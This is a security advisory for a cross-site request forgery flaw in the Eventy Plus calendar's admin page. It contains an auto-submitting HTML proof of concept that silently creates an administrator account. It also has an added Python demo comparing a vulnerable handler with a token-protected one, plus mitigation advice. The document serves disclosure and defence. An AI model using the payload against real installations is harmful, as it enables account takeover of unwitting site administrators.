Eventy Plus Cross Site Request Forgery

2014.03.04
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

[+] Author: TUNISIAN CYBER
[+] Exploit Title: Eventy Plus Cross-Site Request Forgery (Add Admin) Vulnerability
[+] Date: 03-03-2014
[+] Category: WebApp
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-352
[+] Vendor: http://calendarscripts.info/
[+] Friendly Sites: na3il.com, th3-creative.com
[+] Twitter: @TCYB3R

1. OVERVIEW:
Eventy Plus suffers from a Cross-Site Request Forgery (Add Admin) vulnerability. The administrator-management script a_admins.php accepts a state-changing POST with no anti-CSRF token and no origin check, so an authenticated administrator who opens an attacker-controlled page can be made to create a new administrator account without knowing it.

2. Version: All

3. Background:
Eventy is beautiful and easy-to-use web-based event calendar software. Publish events like parties, courses, meetings, conferences, workshops, and more in an easy and user-friendly way.
http://calendarscripts.info/event-calendar-software.html

4. Proof Of Concept:
The page below auto-submits a POST to a_admins.php carrying the new administrator's username and password. It takes effect when it is loaded in a browser that holds an authenticated Eventy Plus admin session, because the browser attaches the session cookie to the cross-site form submission.

    <html>
    Eventy Plus CSRF Add admin Vulnerability
    <body onload="document.form0.submit();">
    <form method="POST" name="form0" action="http://demo.pimteam.net/eventy-plus/a_admins.php">
    <input type="hidden" name="username" value="TCYB3R"/>
    <input type="hidden" name="pass" value="mootez2"/>
    <input type="hidden" name="add" value="1"/>
    </form>
    </body>
    </html>

5. Solution(s):
No contact from vendor; no vendor fix is available. The standard mitigation for CWE-352 is to require an unpredictable per-session anti-CSRF token on every state-changing request to a_admins.php and to reject submissions whose Origin/Referer is not the application's own.

6. TIME-LINE:
2014-03-01: Vulnerability was discovered.
2014-03-02: No reply.
2014-03-03: No reply.
2014-03-03: Vulnerability published.

7. Greetings:
Xmax-tn, Xtech-set, N43il, Sec4ver, E4A Members
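The following is an added illustration, not code from the advisory or from Eventy Plus. It models an "add admin" handler in the shape of a_admins.php twice: once with only the session cookie gating the action (the pattern the PoC abuses) and once hardened with a synchronizer token and an Origin/Referer check. The handler names, the assumed site origin (the advisory's demo host), the attacker origin and the request dictionaries are all constructed for the demo; run_demo() replays the PoC's form fields against both handlers.

```python
"""Added illustration (not Eventy Plus code): the CSRF-vulnerable 'add admin'
pattern beside a hardened version. Origins, names and requests are assumed."""
import hmac
import secrets
from typing import Optional
from urllib.parse import urlsplit

# Assumed origin of the deployed application (the advisory's demo host).
SITE_ORIGIN = "http://demo.pimteam.net"


def issue_csrf_token(session: dict) -> str:
    """Mint one random token per session; the real admin UI embeds it in its forms.
    An attacker's page cannot read it, so it cannot be forged cross-site."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def request_origin(headers: dict) -> Optional[str]:
    """Origin of the page that submitted the form: Origin header first,
    then the scheme+host of Referer, else None (treated as untrusted)."""
    if "Origin" in headers:
        return headers["Origin"]
    referer = headers.get("Referer")
    if not referer:
        return None
    parts = urlsplit(referer)
    return f"{parts.scheme}://{parts.netloc}"


def vulnerable_add_admin(session: dict, headers: dict, form: dict, admins: dict) -> bool:
    """Vulnerable pattern: the session cookie is the only gate, and browsers
    attach that cookie to a cross-site form POST automatically."""
    if session.get("is_admin") and form.get("add") == "1":
        admins[form["username"]] = form["pass"]  # model only; real code stores a hash
        return True
    return False


def hardened_add_admin(session: dict, headers: dict, form: dict, admins: dict) -> bool:
    """Hardened pattern: same gate, plus a same-origin check and a per-session
    token compared in constant time. Missing headers or token mean reject."""
    if not session.get("is_admin") or form.get("add") != "1":
        return False
    if request_origin(headers) != SITE_ORIGIN:
        return False
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False
    admins[form["username"]] = form["pass"]  # model only; real code stores a hash
    return True


def run_demo() -> dict:
    """Replay the advisory's PoC POST and a legitimate submission against both handlers."""
    session = {"is_admin": True}  # victim's authenticated admin session (constructed)
    token = issue_csrf_token(session)

    # Constructed request matching the PoC: the browser reports the attacker page as Origin.
    forged_headers = {"Origin": "http://attacker.example",
                      "Referer": "http://attacker.example/csrf.html"}
    forged_form = {"username": "TCYB3R", "pass": "mootez2", "add": "1"}

    # Constructed legitimate request from the real admin UI, carrying the token.
    legit_headers = {"Origin": SITE_ORIGIN,
                     "Referer": SITE_ORIGIN + "/eventy-plus/a_admins.php"}
    legit_form = {"username": "ops", "pass": "correct horse", "add": "1", "csrf_token": token}

    vuln_admins, hard_admins = {}, {}
    return {
        "vulnerable_accepts_forged": vulnerable_add_admin(session, forged_headers, forged_form, vuln_admins),
        "hardened_rejects_forged": not hardened_add_admin(session, forged_headers, forged_form, hard_admins),
        "hardened_accepts_legit": hardened_add_admin(session, legit_headers, legit_form, hard_admins),
        "vulnerable_admins": sorted(vuln_admins),
        "hardened_admins": sorted(hard_admins),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Two design points worth noting. The origin check treats an absent Origin and Referer as untrusted rather than as same-origin, since an attacker page can suppress Referer with a referrer policy; the token check is what actually carries the protection, and the origin check is defence in depth. The PoC depends on the browser sending the session cookie with a cross-site top-level POST, which was unconditional in 2014 browsers; SameSite cookie defaults in current browsers narrow this (Chrome's Lax-by-default still permits cookies on top-level POSTs for a short window after the cookie is set), so server-side tokens remain the fix.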


Copyright 2024, cxsecurity.com
